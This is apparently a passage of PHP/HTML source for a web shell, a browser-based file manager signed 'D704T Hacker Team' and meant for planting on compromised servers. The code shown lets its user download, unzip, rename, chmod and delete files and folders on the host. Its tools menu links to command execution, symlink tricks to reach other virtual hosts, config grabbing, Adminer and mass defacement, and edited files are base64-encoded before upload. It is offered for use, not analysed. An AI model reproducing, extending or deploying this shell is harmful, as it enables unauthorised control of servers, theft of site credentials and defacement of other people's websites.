(!is_file($file) || !file_exists($file)) { flash("error", "File not found!"); } // Clean output buffer (IMPORTANT) if (ob_get_level()) { ob_end_clean(); } header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($file) . '"'); header('Content-Length: ' . filesize($file)); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Expires: 0'); readfile($file); exit; } if (isset($_GET["action"]) && $_GET["action"] === "unzip" && isset($_GET["file"])) { $filePath = $path . "/" . $_GET["file"]; if (file_exists($filePath) && is_file($filePath)) { $zip = new ZipArchive; if ($zip->open($filePath) === TRUE) { $extractPath = $path . "/" . pathinfo($filePath, PATHINFO_FILENAME); if (!is_dir($extractPath)) { mkdir($extractPath); } $zip->extractTo($extractPath); $zip->close(); flash("success", "File unzipped successfully!", $path . "/" . pathinfo($filePath, PATHINFO_FILENAME) . $toPage); } else { flash("error", "Failed to unzip file!"); } } else { flash("error", "File does not exist or is not readable!"); } } /* END FILE ACTIONS */ /* FOLDER ACTIONS */ if (isset($_GET["path"]) && @$_GET["action"] === "newfolder") { ?> <form method="post" action=""> <div class='mt-4'> <label for="folder_name" class="block mb-2.5 text-sm font-medium text-gray-900 font-medium dark:text-white">New Folder Name:</label> <input type="text" id="folder_name" name="folder_name" class="block w-full p-2.5 text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" required> <button class="block mt-3 w-full max-w-sm mx-auto text-white bg-indigo-600 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-blue-600 dark:hover:bg-indigo-600 dark:focus:ring-blue-800 cursor-pointer" type="submit" name="newfolder"> Create folder </button> </div> </form> <?php if (isset($_POST["newfolder"])) { $folderName = $_POST["folder_name"]; $folderPath = $path . "/" . $folderName; if (mkdir($folderPath, 0777, true)) { flash("success", "Folder created successfully!", $path . $toPage, $path . "/" . $folderName); } else { flash("error", "Failed to create folder!"); } } } if (isset($_GET["action"]) && $_GET["action"] === "renamefolder" && isset($_GET["folder"])) { $folderPath = $path . "/" . $_GET["folder"]; if (file_exists($folderPath) && is_dir($folderPath) && is_writable($folderPath)) { ?> <form method="post" action=""> <div class='mt-4'> <h2 class='text-lg font-semibold'>Rename Folder: <code><?= htmlspecialchars($_GET["folder"]); ?></code></h2> <input type="text" name="new_name" class="block w-full p-2.5 text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" value="<?= htmlspecialchars($_GET["folder"]); ?>" required> <button class="block mt-3 w-full max-w-sm mx-auto text-white bg-indigo-600 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-blue-600 dark:hover:bg-indigo-600 dark:focus:ring-blue-800 cursor-pointer" type="submit" name="renamefolder"> Rename Folder </button> </div> </form> <?php if (isset($_POST["renamefolder"])) { $newName = $_POST["new_name"]; $newPath = $path . "/" . $newName; if (rename($folderPath, $newPath)) { flash("success", "Folder renamed successfully!"); } else { flash("error", "Failed to rename folder!"); } } } else { ?> <div class='mt-4 text-red-600 font-medium'>Folder does not exist or is not writable.</div> <?php } } if (isset($_GET["action"]) && $_GET["action"] === "chmodfolder" && isset($_GET["folder"])) { $folderPath = $path . "/" . $_GET["folder"]; if (file_exists($folderPath) && is_dir($folderPath)) { ?> <form method="post" action=""> <div class='mt-4'> <h2 class='text-lg font-semibold'>Chmod Folder: <code><?= htmlspecialchars($_GET["folder"]); ?></code></h2> <input type="text" name="new_perms" class="block w-full p-2.5 text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" value="<?= substr(sprintf('%o', @fileperms($folderPath)), -4); ?>" required> <button class="block mt-3 w-full max-w-sm mx-auto text-white bg-indigo-600 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-blue-600 dark:hover:bg-indigo-600 dark:focus:ring-blue-800 cursor-pointer" type="submit" name="chmodfolder"> Change Permission </button> </div> </form> <?php if (isset($_POST["chmodfolder"])) { $newPerms = intval($_POST["new_perms"], 8); if (chmod($folderPath, $newPerms)) { flash("success", "Successfully changed permission!", $path . "&folder=" . $_GET["folder"] . "&action=chmodfolder" . $toPage); } else { flash("error", "Failed to change permission!"); } } } else { ?> <div class='mt-4 text-red-600 font-medium'>Folder does not exist or is not writable.</div> <?php } } if (isset($_GET["action"]) && $_GET["action"] === "deletefolder" && isset($_GET["folder"])) { $folderPath = $path . "/" . $_GET["folder"]; if (file_exists($folderPath) && is_dir($folderPath) && is_writable($folderPath)) { if (deleteFolder($folderPath)) { flash("success", "Folder deleted successfully!"); } else { flash("error", "Failed to delete folder!"); } } else { echo "<div class='mt-4 text-red-600 font-medium'>Folder does not exist or is not writable.</div>"; } } /* END FOLDER ACTIONS */ ?> <?php if (!isset($_GET["action"])): ?> <div class="flex mt-5"> <a class="flex gap-x-1 item-center text-gray-700 uppercase bg-gray-50 shadow-md dark:bg-gray-700 dark:text-gray-400 p-3 rounded-tl-lg br-8 hover:scale-110 transition-transform duration-300 ease-in-out" href="?path=<?= $path; ?>&action=newfile"> <svg class="w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="none" viewBox="0 0 24 24"> <path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M5 12h14m-7 7V5" /> </svg> <span>FILE</span> </a> <a class="flex gap-x-1 item-center text-gray-700 uppercase bg-gray-50 shadow-md dark:bg-gray-700 dark:text-gray-400 p-3 hover:scale-110 transition-transform duration-300 ease-in-out" href="?path=<?= $path; ?>&action=newfolder"> <svg class="w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="none" viewBox="0 0 24 24"> <path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M5 12h14m-7 7V5" /> </svg> <span>DIR</span> </a> <button type="button" id="showTools" class="flex gap-x-1 item-center text-gray-700 uppercase bg-gray-50 shadow-md dark:bg-gray-700 dark:text-gray-400 p-3 rounded-tr-lg bl-8 hover:scale-110 transition-transform duration-300 ease-in-out" href="?path=<?= $path; ?>&action=newfolder"> <svg class="w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="none" viewBox="0 0 24 24"> <path stroke="currentColor" stroke-linejoin="round" stroke-width="2" d="M7.58209 8.96025 9.8136 11.1917l-1.61782 1.6178c-1.08305-.1811-2.23623.1454-3.07364.9828-1.1208 1.1208-1.32697 2.8069-.62368 4.1363.14842.2806.42122.474.73509.5213.06726.0101.1347.0133.20136.0098-.00351.0666-.00036.1341.00977.2013.04724.3139.24069.5867.52125.7351 1.32944.7033 3.01552.4971 4.13627-.6237.8375-.8374 1.1639-1.9906.9829-3.0736l4.8107-4.8108c1.0831.1811 2.2363-.1454 3.0737-.9828 1.1208-1.1208 1.3269-2.80688.6237-4.13632-.1485-.28056-.4213-.474-.7351-.52125-.0673-.01012-.1347-.01327-.2014-.00977.0035-.06666.0004-.13409-.0098-.20136-.0472-.31386-.2406-.58666-.5212-.73508-1.3294-.70329-3.0155-.49713-4.1363.62367-.8374.83741-1.1639 1.9906-.9828 3.07365l-1.7788 1.77875-2.23152-2.23148-1.41419 1.41424Zm1.31056-3.1394c-.04235-.32684-.24303-.61183-.53647-.76186l-1.98183-1.0133c-.38619-.19746-.85564-.12345-1.16234.18326l-.86321.8632c-.3067.3067-.38072.77616-.18326 1.16235l1.0133 1.98182c.15004.29345.43503.49412.76187.53647l1.1127.14418c.3076.03985.61628-.06528.8356-.28461l.86321-.8632c.21932-.21932.32446-.52801.2846-.83561l-.14417-1.1127ZM19.4448 16.4052l-3.1186-3.1187c-.7811-.781-2.0474-.781-2.8285 0l-.1719.172c-.7811.781-.7811 2.0474 0 2.8284l3.1186 3.1187c.7811.781 2.0474.781 2.8285 0l.1719-.172c.7811-.781.7811-2.0474 0-2.8284Z" /> </svg> <span>TOOLS</span> </button> </div> <!-- TOOLS DISPLAY --> <div id="toolsDisplay" class="hidden rounded-tr-lg bl-8 text-gray-700 bg-gray-50 dark:bg-gray-700 dark:text-gray-400 px-3 py-5"> <!-- Row 1 --> <div class="flex justify-center flex-wrap gap-y-2 gap-x-1 w-full max-w-xl mx-auto"> <a href="?path=<?= $path; ?>&action=command<?= $toPage ?>" class="text-white bg-gradient-to-r from-blue-500 via-blue-600 to-blue-700 hover:bg-gradient-to-br focus:ring-4 focus:outline-none focus:ring-blue-300 dark:focus:ring-blue-800 font-medium rounded-lg text-sm px-5 py-2.5 text-center me-2 mb-2"> COMMAND </a> <a href="?path=<?= $path; ?>&action=b64decode<?= $toPage ?>" class="text-white bg-gradient-to-r from-green-400 via-green-500 to-green-600 hover:bg-gradient-to-br focus:ring-4 focus:outline-none focus:ring-green-300 dark:focus:ring-green-800 font-medium rounded-lg text-sm px-5 py-2.5 text-center me-2 mb-2"> BASE64 DECODE </a> <a href="?path=<?= $path; ?>&action=b64encode<?= $toPage ?>" class="text-white bg-gradient-to-r from-cyan-400 via-cyan-500 to-cyan-600 hover:bg-gradient-to-br focus:ring-4 focus:outline-none focus:ring-cyan-300 dark:focus:ring-cyan-800 font-medium rounded-lg text-sm px-5 py-2.5 text-center me-2 mb-2"> BASE64 ENCODE </a> <a href="?path=<?= $path; ?>&action=symvhosts<?= $toPage ?>" class="text-white bg-gradient-to-r from-teal-400 via-teal-500 to-teal-600 hover:bg-gradient-to-br focus:ring-4 focus:outline-none focus:ring-teal-300 dark:focus:ring-teal-800 font-medium rounded-lg text-sm px-5 py-2.5 text-center me-2 mb-2"> SYMLINK VHOSTS </a> <a href="?path=<?= $path; ?>&action=sym403<?= $toPage ?>" class="text-white bg-gradient-to-r from-purple-500 via-purple-600 to-purple-700 hover:bg-gradient-to-br focus:ring-4 focus:outline-none focus:ring-purple-300 dark:focus:ring-purple-800 font-medium rounded-lg text-sm px-5 py-2.5 text-center me-2 mb-2"> SYMLINK 403 </a> <a href="?path=<?= $path; ?>&action=grabconfig<?= $toPage ?>" class="text-white bg-gradient-to-r from-red-400 via-red-500 to-red-600 hover:bg-gradient-to-br focus:ring-4 focus:outline-none focus:ring-red-300 dark:focus:ring-red-800 font-medium rounded-lg text-sm px-5 py-2.5 text-center me-2 mb-2"> GRAB CONFIG </a> <a href="?path=<?= $path; ?>&action=adminer<?= $toPage ?>" class="text-white bg-gradient-to-r from-cyan-400 via-cyan-500 to-cyan-600 hover:bg-gradient-to-br focus:ring-4 focus:outline-none focus:ring-cyan-300 dark:focus:ring-cyan-800 font-medium rounded-lg text-sm px-5 py-2.5 text-center me-2 mb-2"> ADMINER </a> <a href="?path=<?= $path; ?>&action=massdeface<?= $toPage ?>" class="text-white bg-gradient-to-r from-pink-400 via-pink-500 to-pink-600 hover:bg-gradient-to-br focus:ring-4 focus:outline-none focus:ring-pink-300 dark:focus:ring-pink-800 font-medium rounded-lg text-sm px-5 py-2.5 text-center me-2 mb-2"> MASS DEFACE </a> </div> </div> <!-- END TOOLS DISPLAY --> <!-- TABLE DISPLAY --> <div class="relative overflow-x-auto shadow-lg rounded-br-lg rounded-bl-lg rounded-tr-lg"> <?php if (@is_readable($path)): ?> <table class="w-full text-sm text-left rtl:text-right text-gray-500 dark:text-gray-400"> <thead class="text-xs text-gray-700 uppercase bg-gray-50 dark:bg-gray-700 dark:text-gray-400"> <tr> <th class="px-6 py-3">Name</th> <th class="px-6 py-3">Size</th> <th class="px-6 py-3">Owner/Group</th> <th class="px-6 py-3">Last Modified</th> <th class="px-6 py-3">Permission</th> <th class="px-6 py-3">Action</th> </tr> </thead> <tbody> <?php $itemsPerPage = 70; // Get all items $allItems = scandir($path); $allItems = array_diff($allItems, ['.', '..']); // Apply search filter if ($search !== '') { $allItems = array_filter($allItems, function ($item) use ($search) { return strpos(strtolower($item), $search) !== false; }); } $allItems = array_values($allItems); // reindex // Separate folders and files $folders = []; $files = []; foreach ($allItems as $item) { if (is_dir($path . DIRECTORY_SEPARATOR . $item)) { $folders[] = $item; } else { $files[] = $item; } } // Merge with folders first $sortedItems = array_merge($folders, $files); // Pagination $totalItems = count($sortedItems); $totalPages = @ceil($totalItems / $itemsPerPage); $page = isset($_GET['page']) ? max(1, intval($_GET['page'])) : 1; $offset = ($page - 1) * $itemsPerPage; $pagedItems = array_slice($sortedItems, $offset, $itemsPerPage); if (empty($pagedItems)) { echo "<tr><td colspan='6' class='px-6 py-4 text-center text-gray-500 dark:text-gray-400'>No matching files or folders found.</td></tr>"; } // Folders foreach ($pagedItems as $folder) { if (is_file($path . DIRECTORY_SEPARATOR . $folder)) continue; $folderPath = $path . "/" . $folder; $folderPerms = substr(sprintf('%o', @fileperms($folderPath)), -4); ?> <tr class='bg-white border-b dark:bg-gray-800 dark:border-gray-700 hover:bg-gray-50 shadow-md dark:hover:bg-gray-600'> <td class='px-6 py-4 font-medium text-gray-900 whitespace-nowrap dark:text-white'> <a class="flex items-center gap-x-1" href="?path=<?= $path . DIRECTORY_SEPARATOR . $folder; ?>&search=<?= $search ?>"> <svg class="w-6 h-6 text-yellow-500 dark:text-yellow-400" xmlns="http://www.w3.org/2000/svg" fill="currentColor" viewBox="0 0 24 24"> <path fill-rule="evenodd" d="M3 6a2 2 0 0 1 2-2h5.532a2 2 0 0 1 1.536.72l1.9 2.28H3V6Zm0 3v10a2 2 0 0 0 2 2h14a2 2 0 0 0 2-2V9H3Z" clip-rule="evenodd" /> </svg> <span><?= htmlspecialchars($folder); ?></span> </a> </td> <td class='px-6 py-4 font-medium'>---</td> <td class='px-6 py-4 font-medium whitespace-nowrap'><?= gor($folderPath); ?>/<?= ggr($folderPath); ?></td> <td id='chdate' data-item-path='<?= $folder ?>' class='px-6 py-4 font-medium whitespace-nowrap'><?= filedate($folderPath); ?></td> <td class='px-6 py-4 font-medium <?= is_writable($folderPath) ? "text-green-500 dark:text-green-400" : "text-red-500 dark:text-red-400"; ?>'><?= $folderPerms; ?></td> <td class='px-6 py-4 flex gap-x-1'> <a href="?path=<?= $path ?>&folder=<?= $folder ?>&action=renamefolder<?= $toPage ?>"> <svg class="w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="none" viewBox="0 0 24 24"> <path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10.779 17.779 4.36 19.918 6.5 13.5m4.279 4.279 8.364-8.643a3.027 3.027 0 0 0-2.14-5.165 3.03 3.03 0 0 0-2.14.886L6.5 13.5m4.279 4.279L6.499 13.5m2.14 2.14 6.213-6.504M12.75 7.04 17 11.28" /> </svg> </a> <a href="?path=<?= $path ?>&folder=<?= $folder ?>&action=chmodfolder<?= $toPage ?>"> <svg class="w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="none" viewBox="0 0 24 24"> <path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M8 8v8m0-8h8M8 8H6a2 2 0 1 1 2-2v2Zm0 8h8m-8 0H6a2 2 0 1 0 2 2v-2Zm8 0V8m0 8h2a2 2 0 1 1-2 2v-2Zm0-8h2a2 2 0 1 0-2-2v2Z" /> </svg> </a> <a href="?path=<?= $path ?>&folder=<?= $folder ?>&action=deletefolder<?= $toPage ?>"> <svg class="w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="currentColor" viewBox="0 0 24 24"> <path fill-rule="evenodd" d="M8.586 2.586A2 2 0 0 1 10 2h4a2 2 0 0 1 2 2v2h3a1 1 0 1 1 0 2v12a2 2 0 0 1-2 2H7a2 2 0 0 1-2-2V8a1 1 0 0 1 0-2h3V4a2 2 0 0 1 .586-1.414ZM10 6h4V4h-4v2Zm1 4a1 1 0 1 0-2 0v8a1 1 0 1 0 2 0v-8Zm4 0a1 1 0 1 0-2 0v8a1 1 0 1 0 2 0v-8Z" clip-rule="evenodd" /> </svg> </a> </td> </tr> <?php } // Files foreach ($pagedItems as $file) { if (is_dir($path . DIRECTORY_SEPARATOR . $file)) continue; $filePath = $path . "/" . $file; $fileSize = @filesize($filePath); $filePerms = substr(sprintf('%o', @fileperms($filePath)), -4); ?> <tr class='bg-white border-b dark:bg-gray-800 dark:border-gray-700 hover:bg-gray-50 shadow-md dark:hover:bg-gray-600'> <td class='px-6 py-4 font-medium text-gray-900 whitespace-nowrap dark:text-white'> <a class="flex items-center gap-x-1" href="?path=<?= $path ?>&file=<?= $file ?>&action=view&search=<?= $search . $toPage ?>"> <svg class="w-6 h-6 text-blue-400 dark:text-blue-300" xmlns="http://www.w3.org/2000/svg" fill="currentColor" viewBox="0 0 24 24"> <path fill-rule="evenodd" d="M9 2.221V7H4.221a2 2 0 0 1 .365-.5L8.5 2.586A2 2 0 0 1 9 2.22ZM11 2v5a2 2 0 0 1-2 2H4v11a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V4a2 2 0 0 0-2-2h-7Z" clip-rule="evenodd" /> </svg> <span><?= htmlspecialchars($file); ?></span> </a> </td> <td class='px-6 py-4 font-medium whitespace-nowrap'><?= $fileSize ?> bytes</td> <td class='px-6 py-4 font-medium whitespace-nowrap'><?= gor($filePath); ?>/<?= ggr($filePath); ?></td> <td id='chdate' data-item-path='<?= $file ?>' class='px-6 py-4 font-medium whitespace-nowrap'><?= filedate($filePath); ?></td> <td class='px-6 py-4 font-medium <?= is_writable($filePath) ? "text-green-500 dark:text-green-400" : "text-red-500 dark:text-red-400"; ?>'><?= $filePerms; ?></td> <td class='px-6 py-4 flex gap-x-1'> <a href="?path=<?= $path ?>&file=<?= $file ?>&action=edit<?= $toPage ?>"> <svg class="w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="currentColor" viewBox="0 0 24 24"> <path fill-rule="evenodd" d="M11.32 6.176H5c-1.105 0-2 .949-2 2.118v10.588C3 20.052 3.895 21 5 21h11c1.105 0 2-.948 2-2.118v-7.75l-3.914 4.144A2.46 2.46 0 0 1 12.81 16l-2.681.568c-1.75.37-3.292-1.263-2.942-3.115l.536-2.839c.097-.512.335-.983.684-1.352l2.914-3.086Z" clip-rule="evenodd" /> <path fill-rule="evenodd" d="M19.846 4.318a2.148 2.148 0 0 0-.437-.692 2.014 2.014 0 0 0-.654-.463 1.92 1.92 0 0 0-1.544 0 2.014 2.014 0 0 0-.654.463l-.546.578 2.852 3.02.546-.579a2.14 2.14 0 0 0 .437-.692 2.244 2.244 0 0 0 0-1.635ZM17.45 8.721 14.597 5.7 9.82 10.76a.54.54 0 0 0-.137.27l-.536 2.84c-.07.37.239.696.588.622l2.682-.567a.492.492 0 0 0 .255-.145l4.778-5.06Z" clip-rule="evenodd" /> </svg> </a> <?php if (isZip($filePath)): ?> <a href="?path=<?= $path; ?>&file=<?= $file; ?>&action=unzip<?= $toPage ?>"> <svg class="w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="currentColor" viewBox="0 0 24 24"> <path fill-rule="evenodd" d="M9 2.221V7H4.221a2 2 0 0 1 .365-.5L8.5 2.586A2 2 0 0 1 9 2.22ZM11 2v5a2 2 0 0 1-2 2H4v11a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V4a2 2 0 0 0-2-2h-7Zm3 2h2.01v2.01h-2V8h2v2.01h-2V12h2v2.01h-2V16h2v2.01h-2v2H12V18h2v-1.99h-2V14h2v-1.99h-2V10h2V8.01h-2V6h2V4Z" clip-rule="evenodd" /> </svg> </a> <?php else: ?> <a href="#"> <svg class="w-6 h-6 text-gray-800 dark:text-white opacity-50" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="currentColor" viewBox="0 0 24 24"> <path fill-rule="evenodd" d="M9 2.221V7H4.221a2 2 0 0 1 .365-.5L8.5 2.586A2 2 0 0 1 9 2.22ZM11 2v5a2 2 0 0 1-2 2H4v11a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V4a2 2 0 0 0-2-2h-7Zm3 2h2.01v2.01h-2V8h2v2.01h-2V12h2v2.01h-2V16h2v2.01h-2v2H12V18h2v-1.99h-2V14h2v-1.99h-2V10h2V8.01h-2V6h2V4Z" clip-rule="evenodd" /> </svg> </a> <?php endif; ?> <button onclick="postDownload('<?= addslashes($filePath) ?>')"> <svg class="w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="none" viewBox="0 0 24 24"> <path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M4 15v2a3 3 0 0 0 3 3h10a3 3 0 0 0 3-3v-2m-8 1V4m0 12-4-4m4 4 4-4" /> </svg> </button> <a href="?path=<?= $path ?>&file=<?= $file ?>&action=chmodfile<?= $toPage ?>"> <svg class="w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="none" viewBox="0 0 24 24"> <path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M8 8v8m0-8h8M8 8H6a2 2 0 1 1 2-2v2Zm0 8h8m-8 0H6a2 2 0 1 0 2 2v-2Zm8 0V8m0 8h2a2 2 0 1 1-2 2v-2Zm0-8h2a2 2 0 1 0-2-2v2Z" /> </svg> </a> <a href="?path=<?= $path ?>&file=<?= $file ?>&action=deletefile<?= $toPage ?>"> <svg class="w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="currentColor" viewBox="0 0 24 24"> <path fill-rule="evenodd" d="M8.586 2.586A2 2 0 0 1 10 2h4a2 2 0 0 1 2 2v2h3a1 1 0 1 1 0 2v12a2 2 0 0 1-2 2H7a2 2 0 0 1-2-2V8a1 1 0 0 1 0-2h3V4a2 2 0 0 1 .586-1.414ZM10 6h4V4h-4v2Zm1 4a1 1 0 1 0-2 0v8a1 1 0 1 0 2 0v-8Zm4 0a1 1 0 1 0-2 0v8a1 1 0 1 0 2 0v-8Z" clip-rule="evenodd" /> </svg> </a> </td> </tr> <?php } ?> </tbody> </table> <?php else: ?> <div class="flex items-center justify-center w-full h-[150px] bg-gray-50 shadow-md dark:bg-gray-700"> <span class="text-center text-md text-gray-700 uppercase dark:text-gray-400">Directory Is NOT Readable</span> </div> <?php endif; ?> </div> <!-- END TABLE DISPLAY --> <!-- PAGINATION --> <?php if (@is_readable($path)): ?> <div class="flex justify-center mt-4"> <?php if ($totalPages > 1): ?> <nav aria-label="Page navigation"> <ul class="inline-flex space-x-1 text-sm"> <!-- Previous Button --> <li> <?php if ($page > 1): ?> <a href="?path=<?= $path ?>&search=<?= $search ?>&page=<?= $page - 1 ?>" class="flex items-center justify-center w-8 h-8 text-gray-500 bg-white border border-gray-300 rounded-lg hover:bg-gray-100 hover:text-gray-700 dark:bg-gray-800 dark:border-gray-700 dark:text-gray-400 dark:hover:bg-gray-700 dark:hover:text-white"> < </a> <?php else: ?> <span class="flex items-center justify-center w-8 h-8 text-gray-400 bg-gray-200 border border-gray-300 rounded-lg dark:bg-gray-700 dark:border-gray-700 dark:text-gray-500"> < </span> <?php endif; ?> </li> <!-- Page Numbers --> <?php $range = 1; $ellipsisShownLeft = false; $ellipsisShownRight = false; for ($i = 1; $i <= $totalPages; $i++) { if ($i == 1 || $i == $totalPages || ($i >= $page - $range && $i <= $page + $range)) { if ($i == $page) { echo '<li> <span class="flex items-center justify-center w-8 h-8 text-blue-600 border border-gray-300 bg-blue-50 dark:border-gray-700 dark:bg-gray-700 dark:text-white">' . $i . '</span> </li>'; } else { echo '<li> <a href="?path=' . $path . '&search=' . $search . '&page=' . $i . '" class="flex items-center justify-center w-8 h-8 text-gray-500 bg-white border border-gray-300 rounded-lg hover:bg-gray-100 hover:text-gray-700 dark:bg-gray-800 dark:border-gray-700 dark:text-gray-400 dark:hover:bg-gray-700 dark:hover:text-white">' . $i . '</a> </li>'; } } else { if ($i < $page - $range && !$ellipsisShownLeft) { echo '<li><span class="flex items-center justify-center w-8 h-8">...</span></li>'; $ellipsisShownLeft = true; } if ($i > $page + $range && !$ellipsisShownRight) { echo '<li><span class="flex items-center justify-center w-8 h-8">...</span></li>'; $ellipsisShownRight = true; } } } ?> <!-- Next Button --> <li> <?php if ($page < $totalPages): ?> <a href="?path=<?= $path ?>&search=<?= $search ?>&page=<?= $page + 1 ?>" class="flex items-center justify-center w-8 h-8 text-gray-500 bg-white border border-gray-300 rounded-lg hover:bg-gray-100 hover:text-gray-700 dark:bg-gray-800 dark:border-gray-700 dark:text-gray-400 dark:hover:bg-gray-700 dark:hover:text-white"> > </a> <?php else: ?> <span class="flex items-center justify-center w-8 h-8 text-gray-400 bg-gray-200 border border-gray-300 rounded-lg dark:bg-gray-700 dark:border-gray-700 dark:text-gray-500"> > </span> <?php endif; ?> </li> </ul> </nav> <?php endif; ?> </div> <?php endif; ?> <!-- END PAGINATION --> <?php endif; ?> <footer> <div class="mt-6 text-center text-gray-500 text-sm mb-2"> <p><span class="text-blue-600">D704T Hacker Team</span></p><br> </footer> </div> <script> const themeToggleDarkIcon = document.getElementById('theme-toggle-dark-icon'); const themeToggleLightIcon = document.getElementById('theme-toggle-light-icon'); const lightText = document.querySelector('#light-text'); const darkText = document.querySelector('#dark-text'); const themeToggleBtn = document.getElementById('theme-toggle'); if ( localStorage.getItem('color-theme') === 'dark' || (!('color-theme' in localStorage) && window.matchMedia('(prefers-color-scheme: dark)').matches) ) { document.documentElement.classList.add('dark'); themeToggleLightIcon.classList.remove('hidden'); themeToggleDarkIcon.classList.add('hidden'); lightText.classList.remove('hidden'); darkText.classList.add('hidden'); } else { document.documentElement.classList.remove('dark'); themeToggleDarkIcon.classList.remove('hidden'); themeToggleLightIcon.classList.add('hidden'); lightText.classList.add('hidden'); darkText.classList.remove('hidden'); } themeToggleBtn.addEventListener('click', function() { if (document.documentElement.classList.contains('dark')) { document.documentElement.classList.remove('dark'); localStorage.setItem('color-theme', 'light'); themeToggleDarkIcon.classList.remove('hidden'); themeToggleLightIcon.classList.add('hidden'); lightText.classList.add('hidden'); darkText.classList.remove('hidden'); } else { document.documentElement.classList.add('dark'); localStorage.setItem('color-theme', 'dark'); themeToggleLightIcon.classList.remove('hidden'); themeToggleDarkIcon.classList.add('hidden'); lightText.classList.remove('hidden'); darkText.classList.add('hidden'); } }); const edit_form = document.getElementById('handle_file'); if (edit_form) { edit_form.addEventListener('submit', async (e) => { const filename = edit_form.querySelector('[type="text"]'); const textarea = edit_form.querySelector('textarea'); if (filename) { filename.value = filename.value + ".temporary"; } textarea.value = await largeBase64Encode(textarea.value); }); } async function largeBase64Encode(str) { const utf8 = new TextEncoder().encode(str); let binary = ''; const chunkSize = 0x8000; for (let i = 0; i < utf8.length; i += chunkSize) { const chunk = utf8.subarray(i, i + chunkSize); binary += String.fromCharCode.apply(null, chunk); } return btoa(binary); } const closeToast = document.querySelector('[data-dismiss-target="#toast-default"]'); if (closeToast) { closeToast.addEventListener('click', () => { const toast = document.getElementById('toast-default'); if (toast) { toast.classList.add('hidden'); <?php session_unset(); ?> } }); } const toolsBtn = document.getElementById('showTools'); const toolsDisplay = document.getElementById('toolsDisplay'); toolsBtn.addEventListener('click', function() { toolsDisplay.classList.toggle('hidden'); }); function copyToClipboard() { const copyText = document.getElementById('copyTarget').textContent; const copyButton = document.getElementById('copyBtn'); navigator.clipboard.writeText(copyText).then(() => { copyButton.textContent = 'COPIED!'; setTimeout(() => { copyButton.textContent = 'COPY TO CLIPBOARD'; }, 2000); }).catch(err => { console.error('Failed to copy: ', err); }); } function showInfo() { const infoBox = document.getElementById('infoMethod'); infoBox.classList.toggle('hidden'); } const dateElements = document.querySelectorAll('#chdate'); dateElements.forEach(el => { const itemPath = el.getAttribute('data-item-path'); el.addEventListener('dblclick', () => { window.location.href = `?path=<?= $path ?>&item=${itemPath}&action=changedate<?= $toPage ?>`; }); }); function postDownload(path) { const form = document.createElement('form'); form.method = 'post'; const input = document.createElement('input'); input.type = 'hidden'; input.name = 'download'; input.value = btoa(path); form.appendChild(input); document.body.appendChild(form); form.submit(); } </script> <script src="https://cdn.jsdelivr.net/npm/flowbite@3.1.2/dist/flowbite.min.js"></script> </body> </html> <?php ob_end_flush(); ?>